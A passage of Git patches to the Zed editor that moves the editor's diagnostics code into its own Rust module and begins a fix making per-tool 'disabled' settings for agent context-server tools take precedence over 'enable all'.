action.severity, window, cx) - } - - pub fn go_to_prev_diagnostic( - &mut self, - action: &GoToPreviousDiagnostic, - window: &mut Window, - cx: &mut Context, - ) { - if !self.diagnostics_enabled() { - return; - } - self.go_to_diagnostic_impl(Direction::Prev, action.severity, window, cx) - } - - pub fn go_to_diagnostic_impl( - &mut self, - direction: Direction, - severity: GoToDiagnosticSeverityFilter, - window: &mut Window, - cx: &mut Context, - ) { - let buffer = self.buffer.read(cx).snapshot(cx); - let selection = self - .selections - .newest::(&self.display_snapshot(cx)); - - let mut active_group_id = None; - if let ActiveDiagnostic::Group(active_group) = &self.active_diagnostics - && active_group.active_range.start.to_offset(&buffer) == selection.start - { - 
active_group_id = Some(active_group.group_id); - } - - fn filtered<'a>( - severity: GoToDiagnosticSeverityFilter, - diagnostics: impl Iterator>, - ) -> impl Iterator> { - diagnostics - .filter(move |entry| severity.matches(entry.diagnostic.severity)) - .filter(|entry| entry.range.start != entry.range.end) - .filter(|entry| !entry.diagnostic.is_unnecessary) - } - - let before = filtered( - severity, - buffer - .diagnostics_in_range(MultiBufferOffset(0)..selection.start) - .filter(|entry| entry.range.start <= selection.start), - ); - let after = filtered( - severity, - buffer - .diagnostics_in_range(selection.start..buffer.len()) - .filter(|entry| entry.range.start >= selection.start), - ); - - let mut found: Option> = None; - if direction == Direction::Prev { - 'outer: for prev_diagnostics in [before.collect::>(), after.collect::>()] - { - for diagnostic in prev_diagnostics.into_iter().rev() { - if diagnostic.range.start != selection.start - || active_group_id - .is_some_and(|active| diagnostic.diagnostic.group_id < active) - { - found = Some(diagnostic); - break 'outer; - } - } - } - } else { - for diagnostic in after.chain(before) { - if diagnostic.range.start != selection.start - || active_group_id.is_some_and(|active| diagnostic.diagnostic.group_id > active) - { - found = Some(diagnostic); - break; - } - } - } - let Some(next_diagnostic) = found else { - return; - }; - - let next_diagnostic_start = buffer.anchor_after(next_diagnostic.range.start); - let Some((buffer_anchor, _)) = buffer.anchor_to_buffer_anchor(next_diagnostic_start) else { - return; - }; - let buffer_id = buffer_anchor.buffer_id; - let snapshot = self.snapshot(window, cx); - if snapshot.intersects_fold(next_diagnostic.range.start) { - self.unfold_ranges( - std::slice::from_ref(&next_diagnostic.range), - true, - false, - cx, - ); - } - self.change_selections(Default::default(), window, cx, |s| { - s.select_ranges(vec![ - next_diagnostic.range.start..next_diagnostic.range.start, - ]) - }); - 
self.activate_diagnostics(buffer_id, next_diagnostic, window, cx); - self.refresh_edit_prediction(false, true, window, cx); - } - pub fn go_to_next_hunk(&mut self, _: &GoToHunk, window: &mut Window, cx: &mut Context) { let snapshot = self.snapshot(window, cx); let selection = self.selections.newest::(&self.display_snapshot(cx)); @@ -20303,183 +20124,10 @@ impl Editor { window.show_character_palette(); } - fn refresh_active_diagnostics(&mut self, cx: &mut Context) { - if !self.diagnostics_enabled() { - return; - } - - if let ActiveDiagnostic::Group(active_diagnostics) = &mut self.active_diagnostics { - let buffer = self.buffer.read(cx).snapshot(cx); - let primary_range_start = active_diagnostics.active_range.start.to_offset(&buffer); - let primary_range_end = active_diagnostics.active_range.end.to_offset(&buffer); - let is_valid = buffer - .diagnostics_in_range::(primary_range_start..primary_range_end) - .any(|entry| { - entry.diagnostic.is_primary - && !entry.range.is_empty() - && entry.range.start == primary_range_start - && entry.diagnostic.message == active_diagnostics.active_message - }); - - if !is_valid { - self.dismiss_diagnostics(cx); - } - } - } - - pub fn active_diagnostic_group(&self) -> Option<&ActiveDiagnosticGroup> { - match &self.active_diagnostics { - ActiveDiagnostic::Group(group) => Some(group), - _ => None, - } - } - - pub fn set_all_diagnostics_active(&mut self, cx: &mut Context) { - if !self.diagnostics_enabled() { - return; - } - self.dismiss_diagnostics(cx); - self.active_diagnostics = ActiveDiagnostic::All; - } - - fn activate_diagnostics( - &mut self, - buffer_id: BufferId, - diagnostic: DiagnosticEntryRef<'_, MultiBufferOffset>, - window: &mut Window, - cx: &mut Context, - ) { - if !self.diagnostics_enabled() || matches!(self.active_diagnostics, ActiveDiagnostic::All) { - return; - } - self.dismiss_diagnostics(cx); - let snapshot = self.snapshot(window, cx); - let buffer = self.buffer.read(cx).snapshot(cx); - let Some(renderer) = 
GlobalDiagnosticRenderer::global(cx) else { - return; - }; - - let diagnostic_group = buffer - .diagnostic_group(buffer_id, diagnostic.diagnostic.group_id) - .collect::>(); - - let language_registry = self - .project() - .map(|project| project.read(cx).languages().clone()); - - let blocks = renderer.render_group( - diagnostic_group, - buffer_id, - snapshot, - cx.weak_entity(), - language_registry, - cx, - ); - - let blocks = self.display_map.update(cx, |display_map, cx| { - display_map.insert_blocks(blocks, cx).into_iter().collect() - }); - self.active_diagnostics = ActiveDiagnostic::Group(ActiveDiagnosticGroup { - active_range: buffer.anchor_before(diagnostic.range.start) - ..buffer.anchor_after(diagnostic.range.end), - active_message: diagnostic.diagnostic.message.clone(), - group_id: diagnostic.diagnostic.group_id, - blocks, - }); - cx.notify(); - } - - fn dismiss_diagnostics(&mut self, cx: &mut Context) { - if matches!(self.active_diagnostics, ActiveDiagnostic::All) { - return; - }; - - let prev = mem::replace(&mut self.active_diagnostics, ActiveDiagnostic::None); - if let ActiveDiagnostic::Group(group) = prev { - self.display_map.update(cx, |display_map, cx| { - display_map.remove_blocks(group.blocks, cx); - }); - cx.notify(); - } - } - - /// Disable inline diagnostics rendering for this editor. 
- pub fn disable_inline_diagnostics(&mut self) { - self.inline_diagnostics_enabled = false; - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - } - - pub fn disable_diagnostics(&mut self, cx: &mut Context) { - self.diagnostics_enabled = false; - self.dismiss_diagnostics(cx); - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - } - pub fn disable_word_completions(&mut self) { self.word_completions_enabled = false; } - pub fn diagnostics_enabled(&self) -> bool { - self.diagnostics_enabled && self.lsp_data_enabled() - } - - pub fn inline_diagnostics_enabled(&self) -> bool { - self.inline_diagnostics_enabled && self.diagnostics_enabled() - } - - pub fn show_inline_diagnostics(&self) -> bool { - self.show_inline_diagnostics - } - - pub fn toggle_inline_diagnostics( - &mut self, - _: &ToggleInlineDiagnostics, - window: &mut Window, - cx: &mut Context, - ) { - self.show_inline_diagnostics = !self.show_inline_diagnostics; - self.refresh_inline_diagnostics(false, window, cx); - } - - pub fn set_max_diagnostics_severity(&mut self, severity: DiagnosticSeverity, cx: &mut App) { - self.diagnostics_max_severity = severity; - self.display_map.update(cx, |display_map, _| { - display_map.diagnostics_max_severity = self.diagnostics_max_severity; - }); - } - - pub fn toggle_diagnostics( - &mut self, - _: &ToggleDiagnostics, - window: &mut Window, - cx: &mut Context, - ) { - let diagnostics_enabled = - self.diagnostics_enabled() && self.diagnostics_max_severity != DiagnosticSeverity::Off; - self.diagnostics_enabled = !diagnostics_enabled; - - let new_severity = if self.diagnostics_enabled { - EditorSettings::get_global(cx) - .diagnostics_max_severity - .filter(|severity| severity != &DiagnosticSeverity::Off) - .unwrap_or(DiagnosticSeverity::Hint) - } else { - DiagnosticSeverity::Off - }; - self.set_max_diagnostics_severity(new_severity, cx); - if self.diagnostics_enabled { - self.active_diagnostics = 
ActiveDiagnostic::None; - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - } else { - self.refresh_inline_diagnostics(false, window, cx); - } - - cx.notify(); - } - pub fn toggle_minimap( &mut self, _: &ToggleMinimap, @@ -20491,135 +20139,6 @@ impl Editor { } } - fn refresh_inline_diagnostics( - &mut self, - debounce: bool, - window: &mut Window, - cx: &mut Context, - ) { - let max_severity = ProjectSettings::get_global(cx) - .diagnostics - .inline - .max_severity - .unwrap_or(self.diagnostics_max_severity); - - if !self.inline_diagnostics_enabled() - || !self.diagnostics_enabled() - || !self.show_inline_diagnostics - || max_severity == DiagnosticSeverity::Off - { - self.inline_diagnostics_update = Task::ready(()); - self.inline_diagnostics.clear(); - return; - } - - let debounce_ms = ProjectSettings::get_global(cx) - .diagnostics - .inline - .update_debounce_ms; - let debounce = if debounce && debounce_ms > 0 { - Some(Duration::from_millis(debounce_ms)) - } else { - None - }; - self.inline_diagnostics_update = cx.spawn_in(window, async move |editor, cx| { - if let Some(debounce) = debounce { - cx.background_executor().timer(debounce).await; - } - let Some(snapshot) = editor.upgrade().map(|editor| { - editor.update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) - }) else { - return; - }; - - let new_inline_diagnostics = cx - .background_spawn(async move { - let mut inline_diagnostics = Vec::<(Anchor, InlineDiagnostic)>::new(); - for diagnostic_entry in - snapshot.diagnostics_in_range(MultiBufferOffset(0)..snapshot.len()) - { - let message = diagnostic_entry - .diagnostic - .message - .split_once('\n') - .map(|(line, _)| line) - .map(SharedString::new) - .unwrap_or_else(|| { - SharedString::new(&*diagnostic_entry.diagnostic.message) - }); - let start_anchor = snapshot.anchor_before(diagnostic_entry.range.start); - let (Ok(i) | Err(i)) = inline_diagnostics - .binary_search_by(|(probe, _)| probe.cmp(&start_anchor, 
&snapshot)); - inline_diagnostics.insert( - i, - ( - start_anchor, - InlineDiagnostic { - message, - group_id: diagnostic_entry.diagnostic.group_id, - start: diagnostic_entry.range.start.to_point(&snapshot), - is_primary: diagnostic_entry.diagnostic.is_primary, - severity: diagnostic_entry.diagnostic.severity, - }, - ), - ); - } - inline_diagnostics - }) - .await; - - editor - .update(cx, |editor, cx| { - editor.inline_diagnostics = new_inline_diagnostics; - cx.notify(); - }) - .ok(); - }); - } - - fn pull_diagnostics( - &mut self, - buffer_id: BufferId, - _window: &Window, - cx: &mut Context, - ) -> Option<()> { - // `ActiveDiagnostic::All` is a special mode where editor's diagnostics are managed by the external view, - // skip any LSP updates for it. - - if self.active_diagnostics == ActiveDiagnostic::All || !self.diagnostics_enabled() { - return None; - } - let pull_diagnostics_settings = ProjectSettings::get_global(cx) - .diagnostics - .lsp_pull_diagnostics; - if !pull_diagnostics_settings.enabled { - return None; - } - let debounce = Duration::from_millis(pull_diagnostics_settings.debounce_ms); - let project = self.project()?.downgrade(); - let buffer = self.buffer().read(cx).buffer(buffer_id)?; - - self.pull_diagnostics_task = cx.spawn(async move |_, cx| { - cx.background_executor().timer(debounce).await; - if let Ok(task) = project.update(cx, |project, cx| { - project.lsp_store().update(cx, |lsp_store, cx| { - lsp_store.pull_diagnostics_for_buffer(buffer, cx) - }) - }) { - task.await.log_err(); - } - project - .update(cx, |project, cx| { - project.lsp_store().update(cx, |lsp_store, cx| { - lsp_store.pull_document_diagnostics_for_buffer_edit(buffer_id, cx); - }) - }) - .log_err(); - }); - - Some(()) - } - pub fn set_selections_from_remote( &mut self, selections: Vec>, @@ -25098,16 +24617,6 @@ impl Editor { }; } - fn update_diagnostics_state(&mut self, window: &mut Window, cx: &mut Context<'_, Editor>) { - if !self.diagnostics_enabled() { - return; - } - 
self.refresh_active_diagnostics(cx); - self.refresh_inline_diagnostics(true, window, cx); - self.scrollbar_marker_state.dirty = true; - cx.notify(); - } - pub fn start_temporary_diff_override(&mut self) { self.load_diff_task.take(); self.temporary_diff_override = true; @@ -29637,16 +29146,6 @@ fn edit_prediction_fallback_text(edits: &[(Range, Arc)], cx: &App) } } -pub fn diagnostic_style(severity: lsp::DiagnosticSeverity, colors: &StatusColors) -> Hsla { - match severity { - lsp::DiagnosticSeverity::ERROR => colors.error, - lsp::DiagnosticSeverity::WARNING => colors.warning, - lsp::DiagnosticSeverity::INFORMATION => colors.info, - lsp::DiagnosticSeverity::HINT => colors.hint, - _ => colors.ignored, - } -} - pub fn styled_runs_for_code_label<'a>( label: &'a CodeLabel, syntax_theme: &'a theme::SyntaxTheme, diff --git a/crates/editor/src/editor/diagnostics.rs b/crates/editor/src/editor/diagnostics.rs new file mode 100644 index 00000000000000..b13b4b699f578c --- /dev/null +++ b/crates/editor/src/editor/diagnostics.rs @@ -0,0 +1,519 @@ +use super::*; + +pub trait DiagnosticRenderer { + fn render_group( + &self, + diagnostic_group: Vec>, + buffer_id: BufferId, + snapshot: EditorSnapshot, + editor: WeakEntity, + language_registry: Option>, + cx: &mut App, + ) -> Vec>; + + fn render_hover( + &self, + diagnostic_group: Vec>, + range: Range, + buffer_id: BufferId, + language_registry: Option>, + cx: &mut App, + ) -> Option>; + + fn open_link( + &self, + editor: &mut Editor, + link: SharedString, + window: &mut Window, + cx: &mut Context, + ); +} + +pub fn set_diagnostic_renderer(renderer: impl DiagnosticRenderer + 'static, cx: &mut App) { + cx.set_global(GlobalDiagnosticRenderer(Arc::new(renderer))); +} + +pub(super) struct GlobalDiagnosticRenderer(Arc); + +impl GlobalDiagnosticRenderer { + pub(super) fn global(cx: &App) -> Option> { + cx.try_global::().map(|g| g.0.clone()) + } +} + +impl gpui::Global for GlobalDiagnosticRenderer {} + +#[derive(Debug, Clone)] +pub(super) 
struct InlineDiagnostic { + pub(super) message: SharedString, + pub(super) group_id: usize, + pub(super) is_primary: bool, + pub(super) start: Point, + pub(super) severity: lsp::DiagnosticSeverity, +} + +#[derive(Debug, PartialEq, Eq)] +pub(super) struct ActiveDiagnosticGroup { + active_range: Range, + active_message: String, + group_id: usize, + blocks: HashSet, +} + +#[derive(Debug, PartialEq, Eq)] +pub(super) enum ActiveDiagnostic { + None, + All, + Group(ActiveDiagnosticGroup), +} + +impl Editor { + pub fn go_to_diagnostic( + &mut self, + action: &GoToDiagnostic, + window: &mut Window, + cx: &mut Context, + ) { + if !self.diagnostics_enabled() { + return; + } + self.go_to_diagnostic_impl(Direction::Next, action.severity, window, cx) + } + + pub fn go_to_prev_diagnostic( + &mut self, + action: &GoToPreviousDiagnostic, + window: &mut Window, + cx: &mut Context, + ) { + if !self.diagnostics_enabled() { + return; + } + self.go_to_diagnostic_impl(Direction::Prev, action.severity, window, cx) + } + + pub fn go_to_diagnostic_impl( + &mut self, + direction: Direction, + severity: GoToDiagnosticSeverityFilter, + window: &mut Window, + cx: &mut Context, + ) { + let buffer = self.buffer.read(cx).snapshot(cx); + let selection = self + .selections + .newest::(&self.display_snapshot(cx)); + + let mut active_group_id = None; + if let ActiveDiagnostic::Group(active_group) = &self.active_diagnostics + && active_group.active_range.start.to_offset(&buffer) == selection.start + { + active_group_id = Some(active_group.group_id); + } + + fn filtered<'a>( + severity: GoToDiagnosticSeverityFilter, + diagnostics: impl Iterator>, + ) -> impl Iterator> { + diagnostics + .filter(move |entry| severity.matches(entry.diagnostic.severity)) + .filter(|entry| entry.range.start != entry.range.end) + .filter(|entry| !entry.diagnostic.is_unnecessary) + } + + let before = filtered( + severity, + buffer + .diagnostics_in_range(MultiBufferOffset(0)..selection.start) + .filter(|entry| 
entry.range.start <= selection.start), + ); + let after = filtered( + severity, + buffer + .diagnostics_in_range(selection.start..buffer.len()) + .filter(|entry| entry.range.start >= selection.start), + ); + + let mut found: Option> = None; + if direction == Direction::Prev { + 'outer: for prev_diagnostics in [before.collect::>(), after.collect::>()] + { + for diagnostic in prev_diagnostics.into_iter().rev() { + if diagnostic.range.start != selection.start + || active_group_id + .is_some_and(|active| diagnostic.diagnostic.group_id < active) + { + found = Some(diagnostic); + break 'outer; + } + } + } + } else { + for diagnostic in after.chain(before) { + if diagnostic.range.start != selection.start + || active_group_id.is_some_and(|active| diagnostic.diagnostic.group_id > active) + { + found = Some(diagnostic); + break; + } + } + } + let Some(next_diagnostic) = found else { + return; + }; + + let next_diagnostic_start = buffer.anchor_after(next_diagnostic.range.start); + let Some((buffer_anchor, _)) = buffer.anchor_to_buffer_anchor(next_diagnostic_start) else { + return; + }; + let buffer_id = buffer_anchor.buffer_id; + let snapshot = self.snapshot(window, cx); + if snapshot.intersects_fold(next_diagnostic.range.start) { + self.unfold_ranges( + std::slice::from_ref(&next_diagnostic.range), + true, + false, + cx, + ); + } + self.change_selections(Default::default(), window, cx, |s| { + s.select_ranges(vec![ + next_diagnostic.range.start..next_diagnostic.range.start, + ]) + }); + self.activate_diagnostics(buffer_id, next_diagnostic, window, cx); + self.refresh_edit_prediction(false, true, window, cx); + } + + #[cfg(any(test, feature = "test-support"))] + pub fn active_diagnostic_message(&self) -> Option<&str> { + match &self.active_diagnostics { + ActiveDiagnostic::Group(group) => Some(group.active_message.as_str()), + _ => None, + } + } + + pub fn set_all_diagnostics_active(&mut self, cx: &mut Context) { + if !self.diagnostics_enabled() { + return; + } + 
self.dismiss_diagnostics(cx); + self.active_diagnostics = ActiveDiagnostic::All; + } + + /// Disable inline diagnostics rendering for this editor. + pub fn disable_inline_diagnostics(&mut self) { + self.inline_diagnostics_enabled = false; + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + } + + pub fn disable_diagnostics(&mut self, cx: &mut Context) { + self.diagnostics_enabled = false; + self.dismiss_diagnostics(cx); + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + } + + pub fn diagnostics_enabled(&self) -> bool { + self.diagnostics_enabled && self.lsp_data_enabled() + } + + pub fn inline_diagnostics_enabled(&self) -> bool { + self.inline_diagnostics_enabled && self.diagnostics_enabled() + } + + pub fn show_inline_diagnostics(&self) -> bool { + self.show_inline_diagnostics + } + + pub fn toggle_inline_diagnostics( + &mut self, + _: &ToggleInlineDiagnostics, + window: &mut Window, + cx: &mut Context, + ) { + self.show_inline_diagnostics = !self.show_inline_diagnostics; + self.refresh_inline_diagnostics(false, window, cx); + } + + pub fn set_max_diagnostics_severity(&mut self, severity: DiagnosticSeverity, cx: &mut App) { + self.diagnostics_max_severity = severity; + self.display_map.update(cx, |display_map, _| { + display_map.diagnostics_max_severity = self.diagnostics_max_severity; + }); + } + + pub fn toggle_diagnostics( + &mut self, + _: &ToggleDiagnostics, + window: &mut Window, + cx: &mut Context, + ) { + let diagnostics_enabled = + self.diagnostics_enabled() && self.diagnostics_max_severity != DiagnosticSeverity::Off; + self.diagnostics_enabled = !diagnostics_enabled; + + let new_severity = if self.diagnostics_enabled { + EditorSettings::get_global(cx) + .diagnostics_max_severity + .filter(|severity| severity != &DiagnosticSeverity::Off) + .unwrap_or(DiagnosticSeverity::Hint) + } else { + DiagnosticSeverity::Off + }; + self.set_max_diagnostics_severity(new_severity, cx); + if 
self.diagnostics_enabled { + self.active_diagnostics = ActiveDiagnostic::None; + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + } else { + self.refresh_inline_diagnostics(false, window, cx); + } + + cx.notify(); + } + + pub(super) fn all_diagnostics_active(&self) -> bool { + self.active_diagnostics == ActiveDiagnostic::All + } + + pub(super) fn active_diagnostic_group_id(&self) -> Option { + match &self.active_diagnostics { + ActiveDiagnostic::Group(group) => Some(group.group_id), + _ => None, + } + } + + pub(super) fn has_active_diagnostic_group(&self) -> bool { + matches!(self.active_diagnostics, ActiveDiagnostic::Group(_)) + } + + pub(super) fn refresh_active_diagnostics(&mut self, cx: &mut Context) { + if !self.diagnostics_enabled() { + return; + } + + if let ActiveDiagnostic::Group(active_diagnostics) = &mut self.active_diagnostics { + let buffer = self.buffer.read(cx).snapshot(cx); + let primary_range_start = active_diagnostics.active_range.start.to_offset(&buffer); + let primary_range_end = active_diagnostics.active_range.end.to_offset(&buffer); + let is_valid = buffer + .diagnostics_in_range::(primary_range_start..primary_range_end) + .any(|entry| { + entry.diagnostic.is_primary + && !entry.range.is_empty() + && entry.range.start == primary_range_start + && entry.diagnostic.message == active_diagnostics.active_message + }); + + if !is_valid { + self.dismiss_diagnostics(cx); + } + } + } + + pub(super) fn activate_diagnostics( + &mut self, + buffer_id: BufferId, + diagnostic: DiagnosticEntryRef<'_, MultiBufferOffset>, + window: &mut Window, + cx: &mut Context, + ) { + if !self.diagnostics_enabled() || matches!(self.active_diagnostics, ActiveDiagnostic::All) { + return; + } + self.dismiss_diagnostics(cx); + let snapshot = self.snapshot(window, cx); + let buffer = self.buffer.read(cx).snapshot(cx); + let Some(renderer) = GlobalDiagnosticRenderer::global(cx) else { + return; + }; + + let diagnostic_group = buffer + 
.diagnostic_group(buffer_id, diagnostic.diagnostic.group_id) + .collect::>(); + + let language_registry = self + .project() + .map(|project| project.read(cx).languages().clone()); + + let blocks = renderer.render_group( + diagnostic_group, + buffer_id, + snapshot, + cx.weak_entity(), + language_registry, + cx, + ); + + let blocks = self.display_map.update(cx, |display_map, cx| { + display_map.insert_blocks(blocks, cx).into_iter().collect() + }); + self.active_diagnostics = ActiveDiagnostic::Group(ActiveDiagnosticGroup { + active_range: buffer.anchor_before(diagnostic.range.start) + ..buffer.anchor_after(diagnostic.range.end), + active_message: diagnostic.diagnostic.message.clone(), + group_id: diagnostic.diagnostic.group_id, + blocks, + }); + cx.notify(); + } + + pub(super) fn dismiss_diagnostics(&mut self, cx: &mut Context) { + if matches!(self.active_diagnostics, ActiveDiagnostic::All) { + return; + }; + + let prev = mem::replace(&mut self.active_diagnostics, ActiveDiagnostic::None); + if let ActiveDiagnostic::Group(group) = prev { + self.display_map.update(cx, |display_map, cx| { + display_map.remove_blocks(group.blocks, cx); + }); + cx.notify(); + } + } + + pub(super) fn refresh_inline_diagnostics( + &mut self, + debounce: bool, + window: &mut Window, + cx: &mut Context, + ) { + let max_severity = ProjectSettings::get_global(cx) + .diagnostics + .inline + .max_severity + .unwrap_or(self.diagnostics_max_severity); + + if !self.inline_diagnostics_enabled() + || !self.diagnostics_enabled() + || !self.show_inline_diagnostics + || max_severity == DiagnosticSeverity::Off + { + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + return; + } + + let debounce_ms = ProjectSettings::get_global(cx) + .diagnostics + .inline + .update_debounce_ms; + let debounce = if debounce && debounce_ms > 0 { + Some(Duration::from_millis(debounce_ms)) + } else { + None + }; + self.inline_diagnostics_update = cx.spawn_in(window, async move |editor, cx| { 
+ if let Some(debounce) = debounce { + cx.background_executor().timer(debounce).await; + } + let Some(snapshot) = editor.upgrade().map(|editor| { + editor.update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) + }) else { + return; + }; + + let new_inline_diagnostics = cx + .background_spawn(async move { + let mut inline_diagnostics = Vec::<(Anchor, InlineDiagnostic)>::new(); + for diagnostic_entry in + snapshot.diagnostics_in_range(MultiBufferOffset(0)..snapshot.len()) + { + let message = diagnostic_entry + .diagnostic + .message + .split_once('\n') + .map(|(line, _)| line) + .map(SharedString::new) + .unwrap_or_else(|| { + SharedString::new(&*diagnostic_entry.diagnostic.message) + }); + let start_anchor = snapshot.anchor_before(diagnostic_entry.range.start); + let (Ok(i) | Err(i)) = inline_diagnostics + .binary_search_by(|(probe, _)| probe.cmp(&start_anchor, &snapshot)); + inline_diagnostics.insert( + i, + ( + start_anchor, + InlineDiagnostic { + message, + group_id: diagnostic_entry.diagnostic.group_id, + start: diagnostic_entry.range.start.to_point(&snapshot), + is_primary: diagnostic_entry.diagnostic.is_primary, + severity: diagnostic_entry.diagnostic.severity, + }, + ), + ); + } + inline_diagnostics + }) + .await; + + editor + .update(cx, |editor, cx| { + editor.inline_diagnostics = new_inline_diagnostics; + cx.notify(); + }) + .ok(); + }); + } + + pub(super) fn pull_diagnostics( + &mut self, + buffer_id: BufferId, + _window: &Window, + cx: &mut Context, + ) -> Option<()> { + // `ActiveDiagnostic::All` is a special mode where editor's diagnostics are managed by the external view, + // skip any LSP updates for it. 
+ + if self.active_diagnostics == ActiveDiagnostic::All || !self.diagnostics_enabled() { + return None; + } + let pull_diagnostics_settings = ProjectSettings::get_global(cx) + .diagnostics + .lsp_pull_diagnostics; + if !pull_diagnostics_settings.enabled { + return None; + } + let debounce = Duration::from_millis(pull_diagnostics_settings.debounce_ms); + let project = self.project()?.downgrade(); + let buffer = self.buffer().read(cx).buffer(buffer_id)?; + + self.pull_diagnostics_task = cx.spawn(async move |_, cx| { + cx.background_executor().timer(debounce).await; + if let Ok(task) = project.update(cx, |project, cx| { + project.lsp_store().update(cx, |lsp_store, cx| { + lsp_store.pull_diagnostics_for_buffer(buffer, cx) + }) + }) { + task.await.log_err(); + } + project + .update(cx, |project, cx| { + project.lsp_store().update(cx, |lsp_store, cx| { + lsp_store.pull_document_diagnostics_for_buffer_edit(buffer_id, cx); + }) + }) + .log_err(); + }); + + Some(()) + } + + pub(super) fn update_diagnostics_state( + &mut self, + window: &mut Window, + cx: &mut Context<'_, Editor>, + ) { + if !self.diagnostics_enabled() { + return; + } + self.refresh_active_diagnostics(cx); + self.refresh_inline_diagnostics(true, window, cx); + self.scrollbar_marker_state.dirty = true; + cx.notify(); + } +} diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index 9db33bb9ba7e84..7e751535910420 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -1,11 +1,11 @@ use crate::{ - ActiveDiagnostic, BUFFER_HEADER_PADDING, BlockId, CURSORS_VISIBLE_FOR, ChunkRendererContext, - ChunkReplacement, CodeActionSource, ColumnarMode, ConflictsOurs, ConflictsOursMarker, - ConflictsOuter, ConflictsTheirs, ConflictsTheirsMarker, ContextMenuPlacement, CursorShape, - CustomBlockId, DisplayDiffHunk, DisplayPoint, DisplayRow, EditDisplayMode, EditPrediction, - Editor, EditorMode, EditorSettings, EditorSnapshot, EditorStyle, FILE_HEADER_HEIGHT, - FocusedBlock, 
GutterDimensions, GutterHoverButton, HalfPageDown, HalfPageUp, HandleInput, - HoveredCursor, InlayHintRefreshReason, JumpData, LineDown, LineHighlight, LineUp, MAX_LINE_LEN, + BUFFER_HEADER_PADDING, BlockId, CURSORS_VISIBLE_FOR, ChunkRendererContext, ChunkReplacement, + CodeActionSource, ColumnarMode, ConflictsOurs, ConflictsOursMarker, ConflictsOuter, + ConflictsTheirs, ConflictsTheirsMarker, ContextMenuPlacement, CursorShape, CustomBlockId, + DisplayDiffHunk, DisplayPoint, DisplayRow, EditDisplayMode, EditPrediction, Editor, EditorMode, + EditorSettings, EditorSnapshot, EditorStyle, FILE_HEADER_HEIGHT, FocusedBlock, + GutterDimensions, GutterHoverButton, HalfPageDown, HalfPageUp, HandleInput, HoveredCursor, + InlayHintRefreshReason, JumpData, LineDown, LineHighlight, LineUp, MAX_LINE_LEN, MINIMAP_FONT_SIZE, MULTI_BUFFER_EXCERPT_HEADER_HEIGHT, OpenExcerpts, PageDown, PageUp, PhantomDiffReviewIndicator, Point, RowExt, RowRangeExt, SelectPhase, Selection, SelectionDragState, SelectionEffects, SizingBehavior, SoftWrap, StickyHeaderExcerpt, ToPoint, @@ -2498,12 +2498,7 @@ impl EditorElement { None => return HashMap::default(), }; - let active_diagnostics_group = - if let ActiveDiagnostic::Group(group) = &self.editor.read(cx).active_diagnostics { - Some(group.group_id) - } else { - None - }; + let active_diagnostics_group = self.editor.read(cx).active_diagnostic_group_id(); let diagnostics_by_rows = self.editor.update(cx, |editor, cx| { let snapshot = editor.snapshot(window, cx); diff --git a/crates/editor/src/hover_popover.rs b/crates/editor/src/hover_popover.rs index e43ae09c0d6526..cfa7284127e968 100644 --- a/crates/editor/src/hover_popover.rs +++ b/crates/editor/src/hover_popover.rs @@ -1,6 +1,6 @@ use crate::{ - ActiveDiagnostic, Anchor, AnchorRangeExt, DisplayPoint, DisplayRow, Editor, EditorSettings, - EditorSnapshot, GlobalDiagnosticRenderer, HighlightKey, Hover, + Anchor, AnchorRangeExt, DisplayPoint, DisplayRow, Editor, EditorSettings, EditorSnapshot, + 
GlobalDiagnosticRenderer, HighlightKey, Hover, display_map::{InlayOffset, ToDisplayPoint, is_invisible}, editor_settings::EditorSettingsScrollbarProxy, hover_links::{InlayHighlight, RangeInEditor}, @@ -319,12 +319,8 @@ fn show_hover( } let hover_popover_delay = EditorSettings::get_global(cx).hover_popover_delay.0; - let all_diagnostics_active = editor.active_diagnostics == ActiveDiagnostic::All; - let active_group_id = if let ActiveDiagnostic::Group(group) = &editor.active_diagnostics { - Some(group.group_id) - } else { - None - }; + let all_diagnostics_active = editor.all_diagnostics_active(); + let active_group_id = editor.active_diagnostic_group_id(); let renderer = GlobalDiagnosticRenderer::global(cx); let task = cx.spawn_in(window, async move |this, cx| { From ac0e90b0585f1f713a3c7241ba5c3d8d24552360 Mon Sep 17 00:00:00 2001 From: Om Chillure Date: Tue, 5 May 2026 21:53:03 +0530 Subject: [PATCH 203/231] Fix agent being able to execute tools that are turned off (#54863) #### Closes #54741 Fix disabled context server tools being callable in profiles with `enable_all_context_servers: true` `AgentProfileSettings::is_context_server_tool_enabled` short-circuited on `enable_all_context_servers` and ignored explicit per-tool `false` entries in `context_servers`, so agents could still call tools the user had disabled in their profile. The filter now matches what the tool picker UI already does (`tool_picker.rs:357-371`): the explicit per-tool setting wins, and `enable_all_context_servers` is only consulted as a fallback when the tool has no explicit entry. 
### Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Screenshots : When turned false 1 When true 2 Release Notes: - Fixed agent profiles with `enable_all_context_servers: true` ignoring per-tool `false` overrides in `context_servers`, allowing agents to call tools the user had explicitly disabled. Co-authored-by: Bennet Bo Fenner --- crates/agent_settings/src/agent_profile.rs | 58 ++++++++++++++++++++-- 1 file changed, 53 insertions(+), 5 deletions(-) diff --git a/crates/agent_settings/src/agent_profile.rs b/crates/agent_settings/src/agent_profile.rs index aff666e01111dc..ca448ca85710aa 100644 --- a/crates/agent_settings/src/agent_profile.rs +++ b/crates/agent_settings/src/agent_profile.rs @@ -117,11 +117,10 @@ impl AgentProfileSettings { } pub fn is_context_server_tool_enabled(&self, server_id: &str, tool_name: &str) -> bool { - self.enable_all_context_servers - || self - .context_servers - .get(server_id) - .is_some_and(|preset| preset.tools.get(tool_name) == Some(&true)) + self.context_servers + .get(server_id) + 